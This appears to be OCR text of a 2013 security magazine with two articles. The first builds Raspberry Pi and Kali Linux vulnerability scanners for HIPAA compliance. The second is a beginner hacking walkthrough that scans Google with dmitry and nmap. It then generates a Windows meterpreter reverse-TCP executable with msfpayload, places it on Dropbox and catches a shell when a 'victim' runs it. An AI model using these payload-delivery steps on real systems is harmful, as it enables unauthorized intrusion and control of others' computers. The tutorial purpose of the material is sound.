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system's security policy." Vulnerabilities, whether 
accidentally triggered or intentionally exploited, 
could potentially result in a security incident, such 
as inappropriate access to or disclosure of e-PHI. 
Vulnerabilities may be grouped into two general 
categories, technical and non-technical. Non-tech- 
nical vulnerabilities may include ineffective or non- 
existent policies, procedures, standards or guide 
lines. Technical vulnerabilities may include: holes, 
flaws or weaknesses in the development of infor- 
mation systems; or incorrectly implemented and/or 
configured information systems. 

Project Requirements 

A build versus buy approach was taken to evalu- 
ate solutions as a scalable, affordable, and effective 
method of conducting network vulnerability scans. 
The result of the scans will address HIPAA risk anal- 
ysis requirements while driving vulnerability remedi- 
ation plans. The final solution must scale with grow- 
ing business demands for security assessments so 
automation of distributed scanners was a primary 
consideration. Additionally, the scanners must be 
cost-effective to deploy, easy to manage (more on 
this later), and enable centralized reporting. 

Having familiarity with the Backtrack Linux distri- 
bution, Kali was a logical choice for a best of breed 
offering in the open source community. So what 
is Kali Linux? According to Kali.org, Kali Linux is 
an advanced Penetration Testing and Security Au- 
diting Linux distribution. It is also a complete re- 
build of Backtrack, its predecessor. Kali is free (as 
in beer) and contains over 300 penetration testing 
tools. This seems like a good fit for the low-cost re- 
quirement of the project. 

To further control costs, the Raspberry Pi system 
on a chip (SoC) device was selected as the comput- 
er hardware for the scanners. These tiny computers 
can be purchased from a number of distributors for 
$35.00USD. It must be recognized at this point that 
choosing a low-powered device like the RPi is not 
without trade-offs. We are seeking to balance cost, 
size, and power efficiency against performance re- 
quirements and capabilities of the system. That be- 
ing said, it's hard to argue that a better value can be 
had for a distributed network scanner. 

What's a Raspberry Pi? 

According to the official website (http://www.raspber- 
rypi.org/faqs), "the Raspberry Pi is a credit-card sized 
computer that plugs into your TV and a keyboard. It's 
a capable little PC which can be used for many of the 
things that your desktop PC does, like spreadsheets, 
word-processing and games. It also plays high-def- 
inition video. We want to see it being used by kids 



all over the world to learn programming." Hardware 
Specifications (Raspberry Pi Model B): 

• CPU - 700 MHz ARM processor (overclocks to 
1 GHz) 

• Storage - SD card slot 

• Memory -512MB RAM 

• Graphics - Broadcom VideoCore IV 

• Video Out - Composite RCA and HDMI 

• Audio Out - 3.5mm jack 

• Networking - 10/1 00Mbps Ethernet 

• I/O Ports - 2x USB 




Figure 1. Raspberry Pi Model B 

Designed as a project computer, the Raspberry Pi 
appeared to be a good fit for our specific require- 
ments. I followed the documentation on Kali.org 
for installing Kali ARM on a Raspberry Pi. Since 
this is a proof of concept, an 8GB SDHC Class 10 
card was used for provisioning the operating sys- 
tem. A production system may require more stor- 
age for running multiple reporting tools and keep- 
ing a local copy of the scanning history. 

Some Notes on Installation 

Kali image used for testing: http://cdimage.kali.org/ 
kali-linux- 1 . 0-armel-raspberrypi. img. gz. 

While this is not a Kali/Raspberry Pi installation 
how-to, I figured I would at least touch on the un- 
expected problems encountered during the initial 
set up process. It is often said that installing open 
source systems is not for the faint of heart. I agree. 
While not always straightforward, a bit of Google- 
fu usually saves the day... no exceptions here. 

Note 

/ experienced problems with the kali-linux-1.0.4- 
armel-rpi.img.gz version of the operating system 
(the current version) which resulted in the key- 
board and mouse locking up in the desktop inter- 
face. Troubleshooting this issue led me to forum 
posts discussing the same symptoms and of suc- 
cessful attempts using version 1.0, then applying 
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updates from there. This is the path I took in order 
to make progress on the task at hand. 

Some initial hardware problems were experi- 
enced due to drawing too much power from the 
USB ports. For example, my Apple USB keyboard 
was detected by the operating system, but would 
not work. This was resolved by using a powered 
USB hub to offload the power draw. Trying a differ- 
ent keyboard worked fine without the hub, so your 
mileage will vary. This is only of concern when ini- 
tially configuring the RPi. A mouse and keyboard 
will not be used when the device is running on the 
client's network. If you need the hub during pro- 
duction, the Raspberry Pi can be powered off of 
the same USB hub adding additional power to the 
mouse/keyboard. This is how I ran the device dur- 
ing my testing and eliminated the need for an ad- 
ditional power supply. 

Also, the default install does not fully utilize the 
SD card which led to errors due to a full disk when 
performing updates. This was resolved by us- 
ing the fdisk followed by the resize2f S utilities to 
expand the system partition to use the remain- 
ing free space. Exact details for this can be found 
here: http://raspberrypi.stackexchange.com/ques- 
tions/499/how-can-i-resize-my-root-partition. 

Based on my experience here, some other soft- 
ware housekeeping items are needed (Listing 1)... 

Listing 1. General Kali updates 

#apt-get update - performs general software 
updates 

#apt-get install xfce4 xf ce4-goodies - installs 

items need to support the xserver GUI 
#apt-get install iceweasel - installs the 
default browser 



With the initial hiccups of the installation behind 
me, the next step was to consider what tools from 
the new Kali system would be deployed to perform 
the network vulnerability scans. With so many ca- 
pabilities packed into this Linux security distro, 
there was no shortage of options. 

Running startx from the command prompt cranks 
up the desktop interface. Even if we will not normal- 
ly run our scripts and programs from the GUI, it is 
helpful to drive the system around a bit to familiarize 
ourselves with the tools loaded on the Kali platform. 
Be prepared to grab a cup of coffee when first start- 
ing the graphic interface. The slower processing 
power of the Raspberry box takes a few minutes to 
load the desktop the first time. Patience is rewarded 
with the familiar Kali/Backtrack dragon logo. 



Selecting a Scanner 

With over 300 security tools available on the Ka- 
li system, we must narrow down which tool (or 
tools) to use for our purposes. Here are some of 
the requirements: 

• Scheduled scans for multiple clients, 

• flexibility in configuration, 

• available (free) updates to vulnerability definitions, 

• multiple options for reporting output, 

• secure transmission of reports (more on this to 
follow). 

Let's examine these requirements a bit more. Since 
the concept here is to create a set of distributed 
scanners at various client sites, the system must be 
able to run as a scheduled task and will ultimate- 
ly be called from a master script. Having flexibili- 
ty with its configuration, the software should adapt 
well to changes in solution requirements over time. 
Freely available vulnerability definition updates will 
keep costs down while allowing the system to de- 
tect ever-evolving system threats. The tool should 
provide multiple options for reporting output. Initially 
reports will be generated in basic HTML or PDF for- 
mats, but future requirements will necessitate cap- 
turing granular scanning data for developing a more 
sophisticated (eventual) self-service customer por- 
tal. From a security standpoint, we are not storing 
ePHI; however, we are storing information sensitive 
to the internal structure and systems of our clients' 
networks. As such, precautions to secure transmis- 
sion of reports will be established as part of the so- 
lution. For the reasons described above, I select- 
ed OpenVAS as the scanning tool for this proof of 
concept. No one system will be one hundred per- 
cent effective all of the time. Certain vulnerabilities 
will be missed while some false-positives may be 
reported. Remember - risk "reduction" is the goal 
as risk "elimination" is an unreasonable expecta- 
tion. The important thing is we are using the tool as 
part of an overall security effort. A more attractive 
option would be to deploy multiple scanning tools to 
validate the results and cover gaps that exist from 
a single software solution. For the purposes of this 
phase of the project, we will stick to using a single 
tool for scanning and reporting. 

Working with OpenVAS 

I ran my out-of-the-box OpenVAS install from the 
desktop and fired up the setup script included with 
the GUI menu options. After several attempts to 
configure and run scans with no luck, I decided to 
pursue a different course of action. While search- 
ing for set up guides, I can across an invaluable 



36 



Hamn9 



i> 



Extra 03/2013 



Kali Scanning for HIPAA 



tool - the openvas -check- setup script. While time- 
consuming, the script checks out all parts of the 
OpenVAS system and updates as necessary. I had 
to do the following based on the fixes recommend- 
ed by the script: Listing 2 and Figure 2. 



Listing 2. Initial updating of OpenVAS 

#apt-get install openvas-scanner (this updated 
the scanner and a good number of other com- 
ponents of the system) 
#openvasmd -migrate (upgrades the database) 
#openvas-scapdata-sync (update SCAP feed) 
#openvas-certdata-sync (update CERT feed) 
#openvassd (starts the OpenVAS Server) 
#openvasmd (starts the OpenVAS Manager) 
#openvasad (starts the OpenVAS Administrator) 
#gsad (starts the Greenbone Security Assistant) 



pie Edit yjew lermlnal Go belp 



QK: OpenVAS Manager client certificate 15 present 95 / va r/l 1 h/openvas/CA 
/clientcert ,pem. 

OK: OpenVAS Manager database found in /var/llfc/openvas/flgr /tasks. at. 

OK: Access rights for the OpenVAS Manager database are correct. 
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Figure 2. Migrating the database 

After performing the above, I still go an error stat- 
ing "ERROR: OpenVAS Manager is NOT running!" 
To double-check for listening services, I ran the 

command: netstat -A inet -ntlp. As the OpenVAS 

Manager (openvasmd) was found to be listening 
on its default port, I ignored the "error" and pro- 
ceeded with testing (Figure 3). 



tor. 
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Figure 3. Checking listening ports for the openvasmd service 
Setting up the Scans 

The obligatory disclaimer: I am not an attorney; 
however, I used to work for some. Be sure you 



have expressed written permission to perform any 
penetration tests, vulnerability scans, or enumer- 
ation of network services and host information. 
Conducting security scans without permission is 
against the law and not advocated here. For test- 
ing purposes, I have used my home network and 
my employer's network (with permission) to run 
the scans. Enough said about that. 

Setting up a scan is simply a matter of managing 
(at a minimum): Tasks, Targets, and Scan Configs. 

Tasks - scan jobs made up of the other ele- 
ments. The tasks can be scheduled and leverage 
Escalators, such as send an email when the task 
is complete. 

Targets - IP addresses or ranges of the network 
devices to scan. This can be a single Target con- 
figuration for a simple network or multiple (servers, 
workstations, network devices). Multiple targets 
would be useful when it is desirable to customize the 
level of scanning based on different device types. 

Scan Configs - preset vulnerability scan con- 
figurations using different levels of scanning tech- 
niques. As the more intrusive configs can bring 
down hosts, use caution when making decisions 
on how and when to run the scans. 

For this exercise, I set up three separate scan 
targets - our workstation network, our server net- 
work, and one for my work computer. I then creat- 
ed three tasks to scan the targets named - "Scan 
workstations - Full and fast", "Scan servers - Full 
and fast", and "Scan my PC" respectively. For each 
of these I used the Full and Fast scan option. This 
was the least invasive of the default set of scan 
configurations. The overall process is straightfor- 
ward as the Greenbone Security Desktop interface 
is intuitive in its layout. Several tabs at the bottom 
of the application window delineate the various ar- 
eas for configuration. 

I chose to run the scans manually and did not 
schedule them. The time required to perform the 
scans will vary based on the number of hosts being 
scanned in the current task and the performance 
of the scanner and network. Just to get an idea of 
the traffic generated during a scan, I ran Wireshark 
on my laptop to watch the vulnerability scans. Fur- 
ther analysis of the packets would reveal the mag- 
ic behind the scanning process (Figure 4). 

Hardware Performance 

Let's suffice it to say, the performance of the Rasp- 
berry Pi is underwhelming in this application. This 
is not unexpected actually and, to a certain degree, 
insignificant. While the speed of the scans could 
be increased by using faster hardware, we desire 
inexpensive and good enough. While scanning, 
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the processor hovered around seventy percent uti- 
lization. Further performance gains would be real- 
ized by running OpenVAS from the command line 
only and not from the GUI. In a distributed scanner 
model, the desktop interface would only be used 
on the reporting server. In a real-world application, 
I would choose to spend a little more on a signifi- 
cantly faster device (and still stay below $100 per 
scanner). Some attractive RPi alternatives for the 
ARM processor platform include the Beagle Bone 
Black and the Odroid U2. 

Analyzing the Results 

Once the scan(s) were finished, it was time to eval- 
uate the results. In this case, we will look at a scan 
on my work laptop (a Windows 7 computer). I used 
the HTML version of the report although there are 
other options including XML, PDF and text. 

The Host Summary area of the report provides a 
high-level view of the number of vulnerabilities de- 
tected and the threat level - High, Medium, or Low. 
Since I used the Full and Fast scanning option, I as- 
sumed the threat count would be fairly low. More in- 
vasive scans would likely show more threats at the 
expense of time and higher network activity. For the 
test scan, the results show zero High level threats, 
two Medium and seven Low level. A port summary 
of the detected threats is shown Figure 5. 

Let's take a look at one of the Medium level threats. 
The same process will be used to examine each 
threat to determine a remediation plan for the cli- 
ent. One of the threats detected is called "NVT: DCE 
Services Enumeration" on TCP port 135. A bit of re- 



search on the threat shows Windows computers use 
this port to look up various services running on a re- 
mote computer and is used for remote management 
of the device. The recommendation from the Open- 
VAS report is to "filter incoming traffic to this port". 

Host Summary 

Host Start &»d High Medium Low Log Fabe Pd»»iv^ 

lfL^^^^p:,in 1, 01 i^i'to l.iv ], 05 n-;:J0 0 7 7 74 0 
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Figure 5. OpenVAS HTML Report, Summary Section 

A potential remediation could be to modify the fire- 
wall rules on the Windows computer to only allow 
IP packets sourcing from servers and administrative 
workstations. This would reduce the attack vector 
by blocking connections from peer Windows clients 
on the network (which have no need to communi- 
cate directly to the device). A comprehensive reme- 
diation plan would use a similar approach to ana- 
lyze each threat identified by the scan. The process 
of scanning and remediating identified problems will 
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result in an overall risk reduction with respect to our 
clients' network security (Figure 6). 
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Figure 6. Openl//AS HIM/. Report, Security Issues 

Centralized Reporting 

OpenVAS is designed to leverage remote slave 
scanners. This allows for the Greenbone Security 
Desktop and the underlying OpenVAS components 
to perform the heavy lifting of the remote scanning. 
The advantage of this capability is using a single in- 
terface for scheduling scans and reporting. A cen- 
tralized OpenVAS server can be used to manage 
the entire system. The distributed aspect of the solu- 
tion will allow my security consulting service to scale 
efficiently without unneeded visits to client sites. 
With direct access to all client reports, I can work di- 
rectly with our managed services team to implement 
the remediations. While certainly a great feature, the 
problem with the solution is requiring multiple VPN 
connections into the networks of our medical clients. 
This risk can be mitigated by using a DMZ for the 
OpenVAS master server and scheduling the scans 
in a way where only one client VPN connection is re- 
quired at a time. Leveraging on-demand VPN con- 
nections in conjunction with an idle timeout would be 
the best configuration to eliminate these concerns. 

Note 

Due to the timeline for writing this article, the remote 
scanning capability of OpenVAS was not tested. 

Future Enhancements 

As with any project like this, there is always room 
for improvement. Future requirements to increase 
remote system capabilities will likely push beyond 
the limits of the Raspberry Pi hardware. In that 
case, other slightly more expensive hardware so- 
lutions could be considered without completely re- 
inventing the wheel. For example, many other SoC 
systems are on the market with higher processor 
speeds and more memory than the RPi. As these 
devices use the same processor family as RPi, it 
is expected Kali ARM support will enable use of 
these more capable hardware systems. Some like- 
ly future enhancements include: 

• packet captures of Internet traffic to keep a roll- 
ing history of network activity in the event of a 
breach, 



• leverage additional scanning tools to validate 
OpenVAS scans, 

• harden the Kali install to protect locally stored 
vulnerability reports, 

• deploy a client self-service portal to view a his- 
tory of scans and vulnerability remediation. 

Summary 

This project started as a proof of concept to deter- 
mine the viability of using open source tools like Kali 
to deploy distributed network vulnerability scanners 
on low-cost hardware. The business case for this so- 
lution is to provide value-added consulting services 
to our medical clients and reduce risk as part of a 
comprehensive HIPAA compliance program. The ex- 
periences outlined here demonstrate that Raspber- 
ry Pi and Kali make an effective hardware/software 
platform for network scans. As is to be expected with 
an open source project, more effort and technical 
knowledge is required to deploy (and maintain) the 
solution; however, the long-term return on investment 
makes the endeavor worthwhile. The end goal is to 
have a completely automated and low-cost scanning 
solution where all parties have direct access to the 
reports for compliance and remediation purposes. 
This proof of concept using Kali shows that the end 
goal is certainly within reach. 

HIPAA Terms 

Covered Entity - a healthcare provider, a health 
plan, or healthcare clearinghouse. 

Business Associate - a person or entity that per- 
forms certain functions or activities that involve the 
use or disclosure of protected health information on 
behalf of, or provides services to, a covered entity. 

Electronic Protected Health Information (e-PHI) 
- individually identifiable health information is 
that which can be linked to a particular person. 
Common identifiers of health information include 
names, social security numbers, addresses, and 
birth dates. 
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KALI LINUX 

A Solution to HACKING/SECURITY 

Today is the world of technology and everyone somehow is 
attached to it. Some are using the technology for the good 
purpose and some are using it for bad purposes and Internet 
is one of those technologies which define both my statements. 
Internet is being used both by the good (the White Hats) and 
the bad (the Black Hats). So, my paper is totally based on the 
above line that the OS (Operating System) KALI LINUX (which 
is an extension to Backtrack) can be used in both the ways 
either in good things or in bad things. 



In the depth of crisis, hacking over the Internet 
is still the very big problem, because the rate of 
technology is increasing day by day and every- 
one here is for earning money. In that case some 
earn the money through bad methods or some 
by good methods. So, as a hacker I don't support 
people earning money with bad methodologies. 
Now with the depth of hacking, some big com- 
panies over the Internet like Facebook, Google, 
Firefox, and many more opened up a scheme of 
bug bounties in which hackers from all over the 
world are invited to find out a bug or vulnerability 
in their services, which if found they pay them with 
high bounties for their hard + smart work. To find 
out those bugs hackers have to use some meth- 
odologies either based on command line or GUI 
based interfaces. Therefore in order to fulfill this 
demand of hackers, another type of Operating sys- 
tem called Kali Linux came into the market which is 
an extension to Backtrack. Now Kali Linux is very 
much helpful for penetration testing and vulnerabil- 
ity assessments. I am going to show the various 
tools that can be used for penetration testing and 
also for attacking. This guide on Kali Linux will de- 
scribe both the parts. 

Now before moving on to the real demonstra- 
tions let's just go through some of the definitions 
and terminologies so that while performing there 
should be no dilemma in the minds of the people. 



What is Kali Linux and what's its use? 

Now this question must come in the minds of the 
people that what is Kali Linux. Let me just clear this 
concept that Kali Linux is a complete re-building of 
the Backtrack Linux distributions which is based 
upon the Debian platform. Now Kali Linux is an ad- 
vance version of OS which is used for penetration 
testing and security auditing Linux distributions. 
This is also an open source OS which is available 
freely on the Internet. So that anyone can down- 
load from the Internet. 

Features of Kali Linux 

Some of the features that makes Kali much more 
compatible and useful than any other Linux distri- 
butions. 

• Kali Linux come up with 300+ penetration test- 
ing tools which are enough to audit any OS, 
any website or web apps. 

• Much more powerful and faster than Backtrack. 

• In Backtrack many tools didn't work which are 
eliminated in Kali. 

• Open source and freely available on Internet. 

• Kali Linux is much more compatible with wire- 
less devices. 

• Comes in a package of multi languages so that 
every person can enjoy assessments in their 
own language. 
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• The packages that are included in the Kali 
Linux are signed by each individual (GPG sig- 
natures). 

• It includes the latest patch for injections which 
could help the pentesters to do assessments 
on the various wireless techniques 

• And many more. 

Let us have a close look to Kali now. 
A survey to Kali Linux 

The outer look of Kali is pretty much different from 
any other Linux distributions like backtrack. The 
default username and password to enter into the 
Kali is same as that of backtrack - username - 
root and password - toor (Figure 1 ). 



i dX« u 




Figure 1 . The login panel of Kali 



This is how exactly the Kali looks when you en- 
ter to the main desktop. Just reject the folders. 
Now this is my Kali installed in the virtual ma- 
chine and I am not wasting the time in the instal- 
lation process because people are smart enough 
to carry out the installation of any operating sys- 
tem. So, let's just focus on our main task. Just 
look at the top-right corner of the window it will 
show that who is currently logged into your sys- 
tem (Figure 2). 

Now moving on to the next, the very first task 
when you enter into the Kali is to check whether 
the Internet connection is working fine or not. Be- 
low in the snapshot just look at the cursor at the 
top right corner showing the wired network which 
means the Internet is working fine in the virtual ma- 
chine with NAT enabled (Figure 3). 

Now let's get familiar with the terminal. In win- 
dows there is a command prompt from where the 
whole system can be assessable, in Linux there 
is something called as terminal which is a based 
upon the command line interface from where the 
whole system can be viewed. In order to open the 
terminal just follow the path as - "Applications > 
Accessories > terminal" and from there you can 
simply copy the terminal to the desktop like I did, 
so that every time the user doesn't have to go 
there, he just come in and click on the terminal to 
access it (Figure 4). 




Figure 2. The desktop 



Figure 4. Showing the path to open the terminal 




Figure 3. Showing the Internet connectivity 
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And this is how the terminal looks like (Figure 5). 

Now let's get our hands dirty by running some of 
the commands in the terminal and let's get friendly 
with the Linux. 

Some of the important commands which will help 
the user to get friendly with Kali: 

• In order to run a service in Linux just run 
service <name> start. For an instance let's say 
I have run a service called apache2 for my lo- 
cal-host then I will type, "service apache2 
start" (Figure 6). And in order to check wheth- 
er the service has been successfully started or 
not. Just start your Internet browser and write 
"127.0.0.1" which is a loopback address which 
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Figure 6. Showing to start the apache2 service 



Figure 7. Shows Apache is successfully running 
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Figure 8. Showing to open the Firefox browser 
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shows the successful working of the Apache 
server (Figure 7). 

• In order to open the Internet browser through 
the terminal, just enter "Firefox &" and it will 
open the browser and also shows that what ex- 
actly the PID (process ID) for this browser pro- 
cess has been allocated (Figure 8). 

• If the root wants to change the password of his 
account, he can simply do it by entering the 
command, "passwd" and enter the password it 
will change the password from default "toor" to 
say "123" (Figure 9) 

Till now we have seen some of the important 
commands which make a user friendly with the 
Linux terminal. Some more commands which are 
very helpful for any user to get started with the 
Linux and those are: 

• Is - list the files and folders of the current di- 
rectory 

• cd - change directory 

• touch - to make a file 

• mkdir - to create a directory 

• rm - removes the files, rm -R removes files 
and directories 

• rmdir - removes the empty directories 

• man - open the manual for the commands 

• time - to see the current time 




Figure 9. Changing root default password 




Figure 10. Exploring the tools 
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• date - shows the current 

• nano - another editor for the creation and edit- 
ing of the files. 

Now these are some of the most important com- 
mands which will help any user in the further 
process. Now let us just get back to our main 
motive but before first let me make everyone fa- 
miliar with some of the terminologies which will 
help everyone to understand the basic concept 
behind the scene. 

Now in order to begin with any kind of hacking 
every person has to go through some phases and 
those phases are knows as the hacking phases 
and those are: 

Steps Performed by Hackers: 

There are only five steps in order to hack anything 
in this world: 

Information Gathering 
Scanning 
Gaining Access 
Maintaining Access 
Covering Tracks 

In order to explore more about these hacking 
steps let's just check from where all the tools can 
be accessed in GUI interface (Figure 10). 

Now there are more than 300+ tools in Kali Linux 
which will help to acquire the remote systems, 
generating your own payloads, addition of latest 
exploits, scanning process and much more. Now 
it is not possible for me also to explore each and 
every tool in the tool list but what I am going to do 
here is sticking to the main concept and will going 
to show the main tools which will make a person 
familiar with the Kali and it will also make them free 
to use the tools of their own. 

Information Gathering 

the very first step in order to gather each and ev- 
ery information about the target, only then a tes- 
ter can examine the whole bunch of vulnerabili- 
ties and can patch them easily and safely. Now 
the major source of gathering the information is 
Google which is an open source and is available 
for each person. But the information gathering de- 
pends upon: 

• Active gathering- which completely means a 
user is interacting with the target directly. For 
an instance - making a phone call to a friend 
working in the target company and gathering 
the information by spoofing your own friend. 



• Passive gathering - in which a user is not di- 
rectly interacting with the target means collect- 
ing the information from search engines like 
Google or Bing (Figure 11). 

Now the main task is to gather the IP (Internet 
Protocol) address which is a 32-bit unique num- 
ber and is being assigned to everyone. The best 
method is to ping a website and gather the IP ad- 
dress. Although the ping is used for checking the 
whether the host is alive or not but here we are 
quite stick to our own method. So, if your target is 




Figure 11. Gathering information from Google 




Figure 1 2. Acquiring the IP address of a particular website 




Figure 13. Options in Dmitry 
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website simply ping <website name> and copy the 
IP address (Figure 12). 

Now the next information gather is to check for 
the: 

• reverse look up 

• DNS information 

• IP address 

• and type of target 

Now in Kali there is only tool which can give you 
all these results, and you don't have your Inter- 
net every time to go a website and start search- 
ing for the results. The tool that I am using here is 
"dmitry" which is completely based on command 
line but very easy to use and even give the results 
faster and accurate. 

So in order to use dmitry simply run the following 
command (Figure 13-15): 

<dmitry -winsepfb -t 0-9 -e IP> 

Now in this particular scan I have targeted the 
Google and it shows the scan results that all the 
150 ports are in a closed state. You can simply 
put as many as options you want. 



Scanning 

The second most important phase to find out the 
services that are vulnerable, the open ports, and 
many other types of types of services which are 
vulnerable in windows, websites, routers, and net- 
works etc. therefore, scanning is broadly divided 
into major three parts: 

• Port scanning: In this method the attacker will 
send a number of messages to break into the 
computer so that he can get the information 
about the computer's network. 

• Network Scanning: To check the number of ac- 
tive hosts on the network. 

• Vulnerability scanning: Means to check the 
weaknesses in the target so that it attacker us- 
es those to gain the access of the target 

So now I am going to use the universal vulner- 
ability scanner which gives the best output for 
scanning process and is an open source avail- 
able freely on the Internet and the tool known is 
nmap which is responsible a number of finger- 
printing, service fingerprinting and numerous 
TCP scan, stealth scan, UDP scan, PORT scan 
and many more. 




Figure 14. Running Dmitry against Google 
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Figure 15. Results of the Dmitry scan 
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Figure 16. Invoking the nmap in the terminal 




Figure 17. TCP scans 
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Stepl 

Invoke the nmap by running the command "nmap" 
(Figure 16). 



Step 2 

Check for TCP SCAN. Command used 
-st IPaddress (Figure 17). 



is: namp 



Exploitation 

Gaining Access or exploitation means to acquire 
any computer system, control panel of any website 
or any network without someone's permission. The 
attacker in this phase attacks on the systems to 
gain the access and steals the important informa- 
tion about the company which he wants to exploit. 
The exploit can occur in LAN (Local Area Network), 
in a WAN (Wide Area Network) and also it can also 
occur offline like REVERSE ENGINEERING, Buf- 
fer Overflow Attacks, Password Filtering etc. 

Now in this particular phase I am going to exploit 
my own WIN-7 just to show how the exploitation 
can be done through Kali Linux in much faster way 
than Backtrack. 

Before going deep into the exploitation let me 
clear some of the basic terminologies so that there 
should be no confusion while going through attack- 
ing phase. 

• Threat: A threat is potential violation of the se- 
curity. 

• Vulnerability: It is the weakness in the design of 
an application or any website that can lead to 
compromising with the security of the system or 
the network or any web based application. 

• Attack: To set up a violence force. 

• Exploit: It means to breach the security of the 
IT (Info. Tech.) System through the vulnerabili- 
ty. 

• Payload: Payloads in computer security are re- 
lated to malicious files (generally .exe) which 
perform malicious activity. 

• Reverse TCP connection: A reverse connec- 
tion actually made to bypass the restrictions 
that the firewall has applied on the open ports. 
A firewall actually blocks the incoming traffic 
through the open ports but could not block the 
outgoing traffic. So, the attacker use this way 
to bypass the security restrictions. 

Things Required 

• KALI LINUX UPDATED METASPLOIT. 

• An intermediate to upload your payload (I am 
using DROPBOX and SHARE FOLDER of KA- 
LI LINUX). 



Brief Description about the Metasploit 

Metasploit (also known as MS) is basically an open 
source framework that contains all the exploits, 
payloads, helpful in penetration testing and also 
helpful in IDS signature development. MSF actual- 
ly contains the database of the exploit codes which 
when hit on any PC inside or outside the network 
with the concerned vulnerabilities, produce a shell 
at that targeted PC and returns back to the attack- 
er's machine. 
So, let's get started with the exploitation phase: 

• Open up the terminal and invoke the Metasploit 
console by running the command called 
msf console and wait for 1-2 minutes as it takes time 
to load all the payloads, exploits etc (Figure 18). 




Figure 18. Invoking the Metasploit Terminal 




Figure 1 9. Generating a payload for back connection 



. « L m X • □ 




Figure 20. Executing the exploit to run 
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And in the mean while till the msfconsole gets 
opened, open up a new terminal to create a 
payload which will help to create a back con- 
nection, and in order to create a payload enter 
the following command (Figure 19): msf payload 

windows/meterpreter/reverse _ tcp lhost=Kali 
IP address lport=4444 x > /root/Desktop/ 
backconnection.exe 

Now upload it anywhere on the Internet to ex- 
ploit and here I am uploading it in dropbox just 
for demonstration. 

Now coming back to the Metasploit console 
and run the following commands step by step. 

Write the command — use exploit/multi/handler 

and press enter" (Figure 20) 
Set a payload by writing the command (Figure 

21): set payload Windows/vncinj ect/reverse tcp 

Set the LHOST (LOCAL HOST) - set most 
i92.i68.4o.i28 (KALI IP address) (Figure 22) 
Then Just set for the exploit - "exploit" (Figure 23) 
Now as soon as The VICTIM download your 
vulnerable payload file from the INTERNET 
you will get the back connection of his/her PC 
(Figure 24 and Figure 25) 

Maintaining Access 

Maintaining Access is an important phase after 
gaining the access to any computer system. In 
this step the attacker leaves himself an easier 



way in order to come back to into the system lat- 
er. By this step of hacking an attacker can come 
to the gained system anytime even if the service 
he exploited is patched. The Metasploit Persis- 
tent Meterpreter Service is what an attacker usu- 
ally uses, but there's warning when you use this 
persistent Meterpreter requires no authentication. 
But this will have a problem. Any other attacker 
who uses the same service will also have the 
same port address to maintain the access which 
is not a right thing. 

Covering tracks 

Covering tracks is a last phase of hacking. Cover- 
ing tracks refers to the actions that are being un- 
dertaken by an attacker to widen his exploitation of 
the system without being detected. Now the rea- 
son behind covering tracks is to be on the safer 
side and also include the prolonged stay and con- 
tinued use of resources. 

Conclusion 

In the end I would only like to conclude that in 
the depth of crisis, hacking over the INTERNET 
is still a very big problem. Some hackers do it for 
the sake of fun or some do it for the sake of tak- 
ing revenge. Therefore, KALI is the solution of all 
these answers. Kali can be used as an OS for 
penetration testing which could help the security 
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Figure 21. Executing the payload 
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Figure 23. Setting up the exploit in msfconsole 



!X « v** jj- /iaf . ^ £^ 




Figure 22. Setting up the LHOST 



Figure 24. Victim tried to install our payload 



Hamn9 



/■ \ 



< ► 



Extra 03/2013 



KALI LINUX - A Solution to HACKING/SECURITY 




Figure 25. Successfully got the Windows Shell on my KALI 
LINUX 



researchers and analysts to find out the bugs in 
various networks or OS so that they can become 
secure to some extent. 
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